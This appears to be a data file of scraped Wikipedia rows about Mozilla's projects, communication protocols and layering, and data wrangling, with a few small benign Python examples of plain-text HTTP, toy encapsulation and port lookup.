Gecko is also used by Thunderbird, SeaMonkey, and many non-Mozilla applications. Rust is a compiled programming language developed by Mozilla Research. It is designed for safety, concurrency and performance. It is intended for creating large, complex software which must be both fast and safe against exploits. Rust is being used in an experimental layout engine, Servo, which was developed by Mozilla and Samsung. Although Servo is not yet used in any consumer-oriented browsers, the project developers plan for parts of its source code to be incrementally merged into Gecko and Firefox. 84 85 XULRunner is a software platform and technology experiment by Mozilla that allows applications built with the same technologies used by Firefox extensions (XPCOM, Javascript, HTML, CSS, XUL) to be run natively as desktop applications, without requiring Firefox to be installed. XULRunner binaries are available for the Windows, Linux and OS X operating systems, allowing such applications to be effectively cross-platform. Pdf.js is a library developed by Mozilla that allows in-browser rendering of PDF documents using HTML5 Canvas and JavaScript. It is included by default in Firefox and Thunderbird, allowing the browser to render and edit PDF documents without requiring an external plugin. It is available separately as an extension, "PDF Viewer", for Firefox for Android, SeaMonkey, and the Firefox versions which don't include it built-in. It can also be included as part of a website's scripts, to allow PDF rendering for any browser that implements the required HTML5 features and can run JavaScript. sccache is a compiler caching tool, written in Rust similar to Ccache. 86 It acts as a compiler wrapper to avoid unnecessary compilation, storing cached results on local disks or various cloud storage backends. sccache supports caching for C C C code, Rust, and NVIDIA's CUDA using NVCC (compiler). Shumway is a free software replacement for Adobe Flash Player developed by Mozilla since 2012, using open web technologies as a replacement for Flash technologies. It uses Javascript and HTML5 Canvas elements to render Flash and execute Actionscript. It is included by default in Firefox Nightly and can be installed as an extension for any recent version of Firefox. The last implementation was limited in its capabilities to render Flash content outside simple projects. The project was cancelled in 2016. Servo is a browser engine being developed for application and embedded use. 87 In August 2020, during the COVID 19 pandemic, due to lack of funds and organization restructuring, Mozilla laid off most of the Servo development team. Servo then became part of the Linux Foundation, where development currently continues. SOPS 88 is an editor of encrypted files that supports YAML, JSON, ENV, INI and BINARY formats and encrypts with AWS KMS, GCP KMS, Azure Key Vault, age, and PGP. Taskcluster is a task execution framework supporting Mozilla's continuous integration and release processes. 89 Initially designed for Firefox's automated builds and tests, it's a flexible, scalable open-source framework. Taskcluster is used extensively for building and releasing Firefox, Thunderbird, NSS and other Mozilla projects. WebXR Viewer is an AR viewer that lets developers create and run AR experiences built with web technologies and ARKit. 90 Mozilla VR is a team focused on bringing tools, specifications, and standards to the open Web. 
91 Mozilla VR maintains A-Frame, a web framework for building VR experiences, and works on advancing WebVR support within web browsers. On April 26, 2018, the first experiment from their Social Mixed Reality efforts was released: Hubs, a multi-user virtual space in WebVR. 92 Following Mozilla's restructuring in 2024, the company ceased operations for its virtual reality initiative, including Mozilla Hubs, as of May 31, 2024. 93 Mozilla Persona was a secure, cross-browser website authentication mechanism which allowed a user to use a single username and password (or other authentication method) to log into multiple sites. 94 Mozilla Persona shut down on November 30, 2016. 95 The Mozilla Location Service, a free software crowdsourced geolocation service, was started by Mozilla in 2013 and offers a free API. Mozilla Webmaker is Mozilla's educational initiative, and Webmaker's goal is to "help millions of people move from using the web to making the web." As part of Mozilla's non-profit mission, Webmaker aims "to help the world increase their understanding of the web, take greater control of their online lives, and create a more web literate planet." 96 97 Mozilla maintains a comprehensive developer documentation website called the MDN Web Docs which contains information about web technologies including HTML, CSS, SVG, JavaScript, as well as Mozilla-specific information. In addition, Mozilla publishes a large number of videos about web technologies and the development of Mozilla projects on the Air Mozilla website. 98 99 This was renamed to MDN Plus. In July 2017, Mozilla launched the project Common Voice to help make voice recognition open to everyone. 100 Visitors to the website can donate their voice to help build a free software voice recognition engine that anyone can use to make apps for devices and the web that make use of voice recognition. The website allows visitors to read a sentence to help the machine system learn how real people speak, as well as validate the read sentences of other people. Mozilla publishes Common Voice data sets under a CC0 license. 101 On June 26, 2017, Mozilla launched IRL (Online Life Is Real Life) to explore popular stories from the web that deal with issues of the internet that affect society as a whole. 102 In February 2014, Mozilla released Directory Tiles, which showed Firefox users advertisements based on the user's browser history, which was opt-in by default. 103 This feature was controversial, and prompted Mozilla to cancel the feature in December 2015. 104 On December 15, 2017, Mozilla installed an add-on in all Firefox Quantum browsers, titled "Looking Glass", with the description "MY REALITY IS JUST DIFFERENT THAN YOURS", as part of a collaboration between Mozilla and the television show Mr. Robot. Mozilla received some criticism, as the add-on was installed without the user's knowledge or consent. On December 18, Mozilla issued an apology for the installation of the extension, and released the source code of the add-on. 105 106 In October 2017, Mozilla launched an experimental add-on using Cliqz technology for less than one percent of users in Germany installing Firefox. Cliqz recommended results based on the user's browser history, which drew criticism from users. 107 108 In July 2020, Mozilla pushed notifications advertising its own blog post about Facebook 109 and Mozilla's StopHateForProfit campaign. These notifications were sent without user consent 110 and faced a backlash from Firefox users. 
In June 2024, Steve Teixeira, who was the CPO of Mozilla Corporation, filed a lawsuit against the company. Teixeira alleges that he faced discrimination and retaliation by Mozilla after taking three months off to receive cancer treatment, and that "immediately upon his return, Mozilla campaigned to demote or terminate Mr. Teixeira citing groundless concerns and assumptions about his capabilities as an individual living with cancer." 111 112 113 The Mozilla Community consists of over 40,000 active contributors from across the globe. It includes both paid employees and volunteers who work towards the goals set forth 28 in the Mozilla Manifesto. Many of the sub-communities in Mozilla have formed around localization efforts for Mozilla Firefox, and the Mozilla web properties. There are a number of sub-communities that exist based on their geographical locations, where contributors near each other work together on particular activities, such as localization, marketing, PR, and user support. In 2017, Mozilla created a Wireless Innovation for Network Security (WINS) 114 challenge that awarded a total of $2 million in prize money to innovators who used its decentralized design to create wireless solutions for post-natural disaster internet access. This challenge also envisioned connecting communities that lacked internet access. The Mozilla Reps program was a volunteer-based program, which allowed volunteers to become official representatives of Mozilla. Volunteers were required to be 18 years or older in order to participate in the program. Activities under the program included recruitment for contributors, workshops, and attending Mozilla summits. The initiative ended in 2023. 115 The Mozilla Festival (MozFest) is a unique hybrid: part art, tech, and society convening, part maker festival, and the premier gathering for activists in diverse global movements fighting for a more humane digital world. Journalists, coders, filmmakers, designers, educators, gamers, makers, youth, and anyone else, from all over the world, are encouraged to attend, with nearly 10,000 participating virtually in 2021 from more than 87 countries, working together at the intersection of human rights, climate justice, and technology, specifically trustworthy artificial intelligence. The event revolves around key issues based on the chosen theme for that year's festival. MozFest unfolds over the span of two weeks, with more than 500 interactive sessions, films, talks, round-tables, hack-a-thons, exhibits, and socials. Topics include privacy best practices, developing solutions to online misinformation and harassment, building free software tools, supporting trustworthy AI innovations, and more. 116 The titles of the festival revolve around the main theme, freedom, and the Web. MozCamps are multi-day gatherings aimed at growing the contributor network by providing lectures, workshops, and breakout sessions led by Mozilla staff and volunteers. While these camps have been held in multiple locations globally in the past, none have occurred since 2014. 117 Mozilla Summit was a global event with active contributors and Mozilla employees who collaborated to develop a shared understanding of Mozilla's mission. 118 Over 2,000 people representing 90 countries and 114 languages gathered in Santa Clara, Toronto, and Brussels in 2013. 
119 Mozilla held its last Summit in 2017 and replaced it with smaller All Hands gatherings, where both employees and volunteers come together to collaborate. 35 |
361 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Protocol_(computing) | A communication protocol is a system of rules that allows two or more entities of a communications system to transmit information via any variation of a physical quantity. The protocol defines the rules, syntax, semantics, and synchronization of communication and possible error recovery methods. Protocols may be implemented by hardware, software, or a combination of both. 1 Communicating systems use well-defined formats for exchanging various messages. Each message has an exact meaning intended to elicit a response from a range of possible responses predetermined for that particular situation. The specified behavior is typically independent of how it is to be implemented. Communication protocols have to be agreed upon by the parties involved. 2 To reach an agreement, a protocol may be developed into a technical standard. A programming language describes the same for computations, so there is a close analogy between protocols and programming languages: protocols are to communication what programming languages are to computations. 3 An alternate formulation states that protocols are to communication what algorithms are to computation. 4 Multiple protocols often describe different aspects of a single communication. A group of protocols designed to work together is known as a protocol suite; when implemented in software they are a protocol stack. Internet communication protocols are published by the Internet Engineering Task Force (IETF). The IEEE (Institute of Electrical and Electronics Engineers) handles wired and wireless networking and the International Organization for Standardization (ISO) handles other types. The ITU-T handles telecommunications protocols and formats for the public switched telephone network (PSTN). As the PSTN and Internet converge, the standards are also being driven towards convergence. The first use of the term protocol in a modern data-commutation context occurs in April 1967 in a memorandum entitled A Protocol for Use in the NPL Data Communications Network. Under the direction of Donald Davies, who pioneered packet switching at the National Physical Laboratory in the United Kingdom, it was written by Roger Scantlebury and Keith Bartlett. 5 6 7 8 9 On the ARPANET, the starting point for host-to-host communication in 1969 was the 1822 protocol, written by Bob Kahn, which defined the transmission of messages to an IMP. 10 The Network Control Program (NCP) for the ARPANET, developed by Steve Crocker and other graduate students including Jon Postel and Vint Cerf, was first implemented in 1970. 11 The NCP interface allowed application software to connect across the ARPANET by implementing higher-level communication protocols, an early example of the protocol layering concept. 12 The CYCLADES network, designed by Louis Pouzin in the early 1970s was the first to implement the end-to-end principle, and make the hosts responsible for the reliable delivery of data on a packet-switched network, rather than this being a service of the network itself. 13 His team was the first to tackle the highly complex problem of providing user applications with a reliable virtual circuit service while using a best-effort service, an early contribution to what will be the Transmission Control Protocol (TCP). 14 15 16 Bob Metcalfe and others at Xerox PARC outlined the idea of Ethernet and the PARC Universal Packet (PUP) for internetworking. 
17 Research in the early 1970s by Bob Kahn and Vint Cerf led to the formulation of the Transmission Control Program (TCP). 18 Its RFC 675 specification was written by Cerf with Yogen Dalal and Carl Sunshine in December 1974, still a monolithic design at this time. The International Network Working Group agreed on a connectionless datagram standard which was presented to the CCITT in 1975 but was not adopted by the CCITT nor by the ARPANET. 19 Separate international research, particularly the work of R mi Despr s, contributed to the development of the X.25 standard, based on virtual circuits, which was adopted by the CCITT in 1976. 20 21 Computer manufacturers developed proprietary protocols such as IBM's Systems Network Architecture (SNA), Digital Equipment Corporation's DECnet and Xerox Network Systems. 22 TCP software was redesigned as a modular protocol stack, referred to as TCP IP. This was installed on SATNET in 1982 and on the ARPANET in January 1983. The development of a complete Internet protocol suite by 1989, as outlined in RFC 1122 and RFC 1123, laid the foundation for the growth of TCP IP as a comprehensive protocol suite as the core component of the emerging Internet. 23 International work on a reference model for communication standards led to the OSI model, published in 1984. For a period in the late 1980s and early 1990s, engineers, organizations and nations became polarized over the issue of which standard, the OSI model or the Internet protocol suite, would result in the best and most robust computer networks. 24 25 26 The information exchanged between devices through a network or other media is governed by rules and conventions that can be set out in communication protocol specifications. The nature of communication, the actual data exchanged and any state-dependent behaviors, is defined by these specifications. In digital computing systems, the rules can be expressed by algorithms and data structures. Protocols are to communication what algorithms or programming languages are to computations. 3 4 Operating systems usually contain a set of cooperating processes that manipulate shared data to communicate with each other. This communication is governed by well-understood protocols, which can be embedded in the process code itself. 27 28 In contrast, because there is no shared memory, communicating systems have to communicate with each other using a shared transmission medium. Transmission is not necessarily reliable, and individual systems may use different hardware or operating systems. To implement a networking protocol, the protocol software modules are interfaced with a framework implemented on the machine's operating system. This framework implements the networking functionality of the operating system. 29 When protocol algorithms are expressed in a portable programming language the protocol software may be made operating system independent. The best-known frameworks are the TCP IP model and the OSI model. At the time the Internet was developed, abstraction layering had proven to be a successful design approach for both compiler and operating system design and, given the similarities between programming languages and communication protocols, the originally monolithic networking programs were decomposed into cooperating protocols. 30 This gave rise to the concept of layered protocols which nowadays forms the basis of protocol design. 31 Systems typically do not use a single protocol to handle a transmission. 
Instead they use a set of cooperating protocols, sometimes called a protocol suite. 32 Some of the best-known protocol suites are TCP/IP, IPX/SPX, X.25, AX.25 and AppleTalk. The protocols can be arranged based on functionality in groups, for instance, there is a group of transport protocols. The functionalities are mapped onto the layers, each layer solving a distinct class of problems relating to, for instance: application, transport, internet and network interface functions. 33 To transmit a message, a protocol has to be selected from each layer. The selection of the next protocol is accomplished by extending the message with a protocol selector for each layer. 34 There are two types of communication protocols, based on their representation of the content being carried: text-based and binary. 35 A text-based protocol or plain text protocol represents its content in human-readable format, often in plain text encoded in a machine-readable encoding such as ASCII or UTF-8, or in structured text-based formats such as Intel hex format, XML or JSON. The immediate human readability stands in contrast to native binary protocols which have inherent benefits for use in a computer environment (such as ease of mechanical parsing and improved bandwidth utilization). Network applications have various methods of encapsulating data. One method very common with Internet protocols is a text-oriented representation that transmits requests and responses as lines of ASCII text, terminated by a newline character (and usually a carriage return character). Examples of protocols that use plain, human-readable text for their commands are FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol), early versions of HTTP (Hypertext Transfer Protocol), and the finger protocol (a minimal socket-level sketch of such a plain-text exchange is shown after this passage). 36 Text-based protocols are typically optimized for human parsing and interpretation and are therefore suitable whenever human inspection of protocol contents is required, such as during debugging and during early protocol development design phases. A binary protocol utilizes all values of a byte, as opposed to a text-based protocol which only uses values corresponding to human-readable characters in ASCII encoding. Binary protocols are intended to be read by a machine rather than a human being. Binary protocols have the advantage of terseness, which translates into speed of transmission and interpretation. 37 Binary protocols have been used in the normative documents describing modern standards like EbXML, HTTP/2, HTTP/3 and EDOC. 38 An interface in UML 39 may also be considered a binary protocol. Getting the data across a network is only part of the problem for a protocol. The data received has to be evaluated in the context of the progress of the conversation, so a protocol must include rules describing the context. These kinds of rules are said to express the syntax of the communication. Other rules determine whether the data is meaningful for the context in which the exchange takes place. These kinds of rules are said to express the semantics of the communication. Messages are sent and received on communicating systems to establish communication. Protocols should therefore specify rules governing the transmission. In general, much of the following should be addressed: 40 Systems engineering principles have been applied to create a set of common network protocol design principles. The design of complex protocols often involves decomposition into simpler, cooperating protocols. 
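As referenced above, here is a minimal sketch of such a plain-text exchange: an HTTP/1.0 request issued over a raw socket, whose request and response are just ASCII lines terminated by CRLF. The host example.com is only an illustrative public site, and the exact response text will vary.

# Minimal sketch of a text-based protocol exchange (HTTP/1.0 over a raw socket).
# Host and path are illustrative placeholders, not part of the article above.
import socket

def fetch_http10(host="example.com", path="/"):
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n"  # plain ASCII lines
    with socket.create_connection((host, 80), timeout=10) as sock:
        sock.sendall(request.encode("ascii"))
        reply = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            reply += chunk
    # The status line and headers are directly human-readable.
    print(reply.decode("ascii", errors="replace").split("\r\n\r\n")[0])

# fetch_http10()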
Such a set of cooperating protocols is sometimes called a protocol family or a protocol suite, 32 within a conceptual framework. Communicating systems operate concurrently. An important aspect of concurrent programming is the synchronization of software for receiving and transmitting messages of communication in proper sequencing. Concurrent programming has traditionally been a topic in operating systems theory texts. 50 Formal verification seems indispensable because concurrent programs are notorious for the hidden and sophisticated bugs they contain. 51 A mathematical approach to the study of concurrency and communication is referred to as communicating sequential processes (CSP). 52 Concurrency can also be modeled using finite state machines, such as Mealy and Moore machines. Mealy and Moore machines are in use as design tools in digital electronics systems encountered in the form of hardware used in telecommunication or electronic devices in general. 53 better source needed The literature presents numerous analogies between computer communication and programming. In analogy, a transfer mechanism of a protocol is comparable to a central processing unit (CPU). The framework introduces rules that allow the programmer to design cooperating protocols independently of one another. In modern protocol design, protocols are layered to form a protocol stack. Layering is a design principle that divides the protocol design task into smaller steps, each of which accomplishes a specific part, interacting with the other parts of the protocol only in a small number of well-defined ways. Layering allows the parts of a protocol to be designed and tested without a combinatorial explosion of cases, keeping each design relatively simple. The communication protocols in use on the Internet are designed to function in diverse and complex settings. Internet protocols are designed for simplicity and modularity and fit into a coarse hierarchy of functional layers defined in the Internet Protocol Suite. 54 The first two cooperating protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP) resulted from the decomposition of the original Transmission Control Program, a monolithic communication protocol, into this layered communication suite. The OSI model was developed internationally based on experience with networks that predated the internet as a reference model for general communication with much stricter rules of protocol interaction and rigorous layering. Typically, application software is built upon a robust data transport layer. Underlying this transport layer is a datagram delivery and routing mechanism that is typically connectionless in the Internet. Packet relaying across networks happens over another layer that involves only network link technologies, which are often specific to certain physical layer technologies, such as Ethernet. Layering provides opportunities to exchange technologies when needed, for example, protocols are often stacked in a tunneling arrangement to accommodate the connection of dissimilar networks. For example, IP may be tunneled across an Asynchronous Transfer Mode (ATM) network. Protocol layering forms the basis of protocol design. 31 It allows the decomposition of single, complex protocols into simpler, cooperating protocols. 54 The protocol layers each solve a distinct class of communication problems. Together, the layers make up a layering scheme or model. 
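To make the layered encapsulation just described concrete, here is a toy sketch rather than any real protocol stack: on the sending side each layer prepends its own header, and on the receiving side the headers are stripped in reverse order. The layer names and header format are invented purely for illustration.

# Toy illustration of protocol layering; layer names and headers are invented.
LAYERS = ["transport", "internet", "link"]  # layers below the application

def send(message):
    # System A: each layer wraps the message with its own header on the way down.
    frame = message
    for layer in LAYERS:
        frame = f"{layer}-hdr|{frame}"
    return frame  # what travels over the communications channel

def receive(frame):
    # System B: strip the headers in reverse order on the way up the stack.
    for layer in reversed(LAYERS):
        header, _, frame = frame.partition("|")
        assert header == f"{layer}-hdr", "malformed frame"
    return frame

wire = send("hello from A")
print(wire)           # link-hdr|internet-hdr|transport-hdr|hello from A
print(receive(wire))  # hello from A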
Computations deal with algorithms and data; Communication involves protocols and messages; So the analog of a data flow diagram is some kind of message flow diagram. 4 To visualize protocol layering and protocol suites, a diagram of the message flows in and between two systems, A and B, is shown in figure 3. The systems, A and B, both make use of the same protocol suite. The vertical flows (and protocols) are in-system and the horizontal message flows (and protocols) are between systems. The message flows are governed by rules, and data formats specified by protocols. The blue lines mark the boundaries of the (horizontal) protocol layers. The software supporting protocols has a layered organization and its relationship with protocol layering is shown in figure 5. To send a message on system A, the top-layer software module interacts with the module directly below it and hands over the message to be encapsulated. The lower module fills in the header data in accordance with the protocol it implements and interacts with the bottom module which sends the message over the communications channel to the bottom module of system B. On the receiving system B the reverse happens, so ultimately the message gets delivered in its original form to the top module of system B. 55 Program translation is divided into subproblems. As a result, the translation software is layered as well, allowing the software layers to be designed independently. The same approach can be seen in the TCP IP layering. 56 The modules below the application layer are generally considered part of the operating system. Passing data between these modules is much less expensive than passing data between an application program and the transport layer. The boundary between the application layer and the transport layer is called the operating system boundary. 57 Strictly adhering to a layered model, a practice known as strict layering, is not always the best approach to networking. 58 Strict layering can have a negative impact on the performance of an implementation. 59 Although the use of protocol layering is today ubiquitous across the field of computer networking, it has been historically criticized by many researchers 60 as abstracting the protocol stack in this way may cause a higher layer to duplicate the functionality of a lower layer, a prime example being error recovery on both a per-link basis and an end-to-end basis. 61 Commonly recurring problems in the design and implementation of communication protocols can be addressed by software design patterns. 62 63 64 65 66 Popular formal methods of describing communication syntax are Abstract Syntax Notation One (an ISO standard) and augmented Backus Naur form (an IETF standard). Finite-state machine models are used to formally describe the possible interactions of the protocol. 67 68 and communicating finite-state machines 69 For communication to occur, protocols have to be selected. The rules can be expressed by algorithms and data structures. Hardware and operating system independence is enhanced by expressing the algorithms in a portable programming language. Source independence of the specification provides wider interoperability. Protocol standards are commonly created by obtaining the approval or support of a standards organization, which initiates the standardization process. The members of the standards organization agree to adhere to the work result on a voluntary basis. 
Often the members are in control of large market shares relevant to the protocol and in many cases, standards are enforced by law or the government because they are thought to serve an important public interest, so getting approval can be very important for the protocol. The need for protocol standards can be shown by looking at what happened to the Binary Synchronous Communications (BSC) protocol invented by IBM. BSC is an early link-level protocol used to connect two separate nodes. It was originally not intended to be used in a multinode network, but doing so revealed several deficiencies of the protocol. In the absence of standardization, manufacturers and organizations felt free to enhance the protocol, creating incompatible versions on their networks. In some cases, this was deliberately done to discourage users from using equipment from other manufacturers. There are more than 50 variants of the original bi-sync protocol. One can assume, that a standard would have prevented at least some of this from happening. 29 In some cases, protocols gain market dominance without going through a standardization process. Such protocols are referred to as de facto standards. De facto standards are common in emerging markets, niche markets, or markets that are monopolized (or oligopolized). They can hold a market in a very negative grip, especially when used to scare away competition. From a historical perspective, standardization should be seen as a measure to counteract the ill-effects of de facto standards. Positive exceptions exist; a de facto standard operating system like Linux does not have this negative grip on its market, because the sources are published and maintained in an open way, thus inviting competition. Some of the standards organizations of relevance for communication protocols are the International Organization for Standardization (ISO), the International Telecommunication Union (ITU), the Institute of Electrical and Electronics Engineers (IEEE), and the Internet Engineering Task Force (IETF). The IETF maintains the protocols in use on the Internet. The IEEE controls many software and hardware protocols in the electronics industry for commercial and consumer devices. The ITU is an umbrella organization of telecommunication engineers designing the public switched telephone network (PSTN), as well as many radio communication systems. For marine electronics the NMEA standards are used. The World Wide Web Consortium (W3C) produces protocols and standards for Web technologies. International standards organizations are supposed to be more impartial than local organizations with a national or commercial self-interest to consider. Standards organizations also do research and development for standards of the future. In practice, the standards organizations mentioned, cooperate closely with each other. 70 Multiple standards bodies may be involved in the development of a protocol. If they are uncoordinated, then the result may be multiple, incompatible definitions of a protocol, or multiple, incompatible interpretations of messages; important invariants in one definition (e.g., that time-to-live values are monotone decreasing to prevent stable routing loops) may not be respected in another. 71 In the ISO, the standardization process starts off with the commissioning of a sub-committee workgroup. The workgroup issues working drafts and discussion documents to interested parties (including other standards bodies) in order to provoke discussion and comments. 
This will generate a lot of questions, much discussion and usually some disagreement. These comments are taken into account and a draft proposal is produced by the working group. After feedback, modification, and compromise the proposal reaches the status of a draft international standard, and ultimately an international standard. International standards are reissued periodically to handle the deficiencies and reflect changing views on the subject. 72 A lesson learned from ARPANET, the predecessor of the Internet, was that protocols need a framework to operate. It is therefore important to develop a general-purpose, future-proof framework suitable for structured protocols (such as layered protocols) and their standardization. This would prevent protocol standards with overlapping functionality and would allow clear definition of the responsibilities of a protocol at the different levels (layers). 74 This gave rise to the Open Systems Interconnection model (OSI model), which is used as a framework for the design of standard protocols and services conforming to the various layer specifications. 75 In the OSI model, communicating systems are assumed to be connected by an underlying physical medium providing a basic transmission mechanism. The layers above it are numbered. Each layer provides service to the layer above it using the services of the layer immediately below it. The top layer provides services to the application process. The layers communicate with each other by means of an interface, called a service access point. Corresponding layers at each system are called peer entities. To communicate, two peer entities at a given layer use a protocol specific to that layer which is implemented by using services of the layer below. 76 For each layer, there are two types of standards: protocol standards defining how peer entities at a given layer communicate, and service standards defining how a given layer communicates with the layer above it. In the OSI model, the layers and their functionality are (from highest to lowest layer): In contrast to the TCP IP layering scheme, which assumes a connectionless network, RM OSI assumed a connection-oriented network. 84 Connection-oriented networks are more suitable for wide area networks and connectionless networks are more suitable for local area networks. Connection-oriented communication requires some form of session and (virtual) circuits, hence the (in the TCP IP model lacking) session layer. The constituent members of ISO were mostly concerned with wide area networks, so the development of RM OSI concentrated on connection-oriented networks and connectionless networks were first mentioned in an addendum to RM OSI 85 86 and later incorporated into an update to RM OSI. 87 At the time, when? the IETF had to cope with this and the fact that the Internet needed protocols that simply were not there. citation needed As a result, the IETF developed its own standardization process based on "rough consensus and running code". 88 The standardization process is described by RFC 2026. Nowadays, the IETF has become a standards organization for the protocols in use on the Internet. RM OSI has extended its model to include connectionless services and because of this, both TCP and IP could be developed into international standards. 
citation needed The wire image of a protocol is the information that a non-participant observer is able to glean from observing the protocol messages, including both information explicitly given meaning by the protocol, but also inferences made by the observer. 89 Unencrypted protocol metadata is one source making up the wire image, and side-channels including packet timing also contribute. 90 Different observers with different vantages may see different wire images. 91 The wire image is relevant to end-user privacy and the extensibility of the protocol. 92 If some portion of the wire image is not cryptographically authenticated, it is subject to modification by intermediate parties (i.e., middleboxes), which can influence protocol operation. 90 Even if authenticated, if a portion is not encrypted, it will form part of the wire image, and intermediate parties may intervene depending on its content (e.g., dropping packets with particular flags). Signals deliberately intended for intermediary consumption may be left authenticated but unencrypted. 93 The wire image can be deliberately engineered, encrypting parts that intermediaries should not be able to observe and providing signals for what they should be able to. 94 If provided signals are decoupled from the protocol's operation, they may become untrustworthy. 95 Benign network management and research are affected by metadata encryption; protocol designers must balance observability for operability and research against ossification resistance and end-user privacy. 92 The IETF announced in 2014 that it had determined that large-scale surveillance of protocol operations is an attack due to the ability to infer information from the wire image about users and their behaviour, 96 and that the IETF would "work to mitigate pervasive monitoring" in its protocol designs; 97 this had not been done systematically previously. 97 The Internet Architecture Board recommended in 2023 that disclosure of information by a protocol to the network should be intentional, 98 performed with the agreement of both recipient and sender, 99 authenticated to the degree possible and necessary, 100 only acted upon to the degree of its trustworthiness, 101 and minimised and provided to a minimum number of entities. 102 103 Engineering the wire image and controlling what signals are provided to network elements was a "developing field" in 2023, according to the IAB. 104 Protocol ossification is the loss of flexibility, extensibility and evolvability of network protocols. This is largely due to middleboxes that are sensitive to the wire image of the protocol, and which can interrupt or interfere with messages that are valid but which the middlebox does not correctly recognize. 105 This is a violation of the end-to-end principle. 106 Secondary causes include inflexibility in endpoint implementations of protocols. 107 Ossification is a major issue in Internet protocol design and deployment, as it can prevent new protocols or extensions from being deployed on the Internet, or place strictures on the design of new protocols; new protocols may have to be encapsulated in an already-deployed protocol or mimic the wire image of another protocol. 108 Because of ossification, the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) are the only practical choices for transport protocols on the Internet, 109 and TCP itself has significantly ossified, making extension or modification of the protocol difficult. 
110 Recommended methods of preventing ossification include encrypting protocol metadata, 111 and ensuring that extension points are exercised and wire image variability is exhibited as fully as possible; 112 remedying existing ossification requires coordination across protocol participants. 113 QUIC is the first IETF transport protocol to have been designed with deliberate anti-ossification properties. 89 Classification schemes for protocols usually focus on the domain of use and function. As an example of domain of use, connection-oriented protocols and connectionless protocols are used on connection-oriented networks and connectionless networks respectively. An example of function is a tunneling protocol, which is used to encapsulate packets in a high-level protocol so that the packets can be passed across a transport system using the high-level protocol. A layering scheme combines both function and domain of use. The dominant layering schemes are the ones developed by the IETF and by ISO. Despite the fact that the underlying assumptions of the layering schemes are different enough to warrant distinguishing the two, it is a common practice to compare the two by relating common protocols to the layers of the two schemes. 114 The layering scheme from the IETF is called Internet layering or TCP IP layering. The layering scheme from ISO is called the OSI model or ISO layering. In networking equipment configuration, a term-of-art distinction is often drawn: The term protocol strictly refers to the transport layer, and the term service refers to protocols utilizing a protocol for transport. In the common case of TCP and UDP, services are distinguished by port numbers. Conformance to these port numbers is voluntary, so in content inspection systems the term service strictly refers to port numbers, and the term application is often used to refer to protocols identified through inspection signatures. |
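Since the closing paragraph above distinguishes the transport protocol from the service conventionally identified by a well-known port number, Python's standard socket module can show that mapping. As the text notes, conformance to these numbers is voluntary, and the lookup simply reads the local services database, so output may differ between systems.

# Conventional well-known TCP ports and the services associated with them.
import socket

for port in (21, 25, 80, 443):
    try:
        service = socket.getservbyport(port, "tcp")
    except OSError:
        service = "not listed on this system"
    print(f"tcp/{port} -> {service}")  # typically ftp, smtp, http, https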
362 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_wrangling | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure data quality and usefulness. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The non-technical term "wrangler" is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner, the Emory University Libraries-based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA/NOAA Cold Lands Processes Experiment. 4 Cline stated that the data wranglers "coordinate the acquisition of the entire collection of the experiment data." Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the rise of artificial intelligence in data science, it has become increasingly important for automated data wrangling to have very strict checks and balances, which is why the munging of data has not generally been automated by machine learning. Data munging requires more than just an automated solution; it requires knowledge of what information should be removed, and artificial intelligence is not yet at the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some data mining uses, but not always. The purpose of data mining is to find patterns within large data sets, whereas data wrangling transforms data in order to deliver insights about that data. Although data wrangling is a superset of data mining, this does not mean that data mining does not use it; there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. 
An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: say there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston; the data in the set related to the residents of Dallas is not useful to the overall set and can be removed before processing to improve the efficiency of the data mining process. With an increase in raw data comes an increase in the amount of data that is not inherently useful; this increases the time spent on cleaning and organizing data before it can be analyzed, which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data; it is important to ensure metadata is consistent, otherwise it can cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly and achieve more accurate results, and because of this better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling are as follows: This all-encompassing term describes how to understand your data. This is the first step to familiarize yourself with your data. These steps are an iterative process that should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set to read (a short pandas sketch of this clean-up appears after this row). All names are now formatted the same way (first name, last name), phone numbers are also formatted the same way (area code-XXX-XXXX), dates are formatted numerically (YYYY-mm-dd), and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will 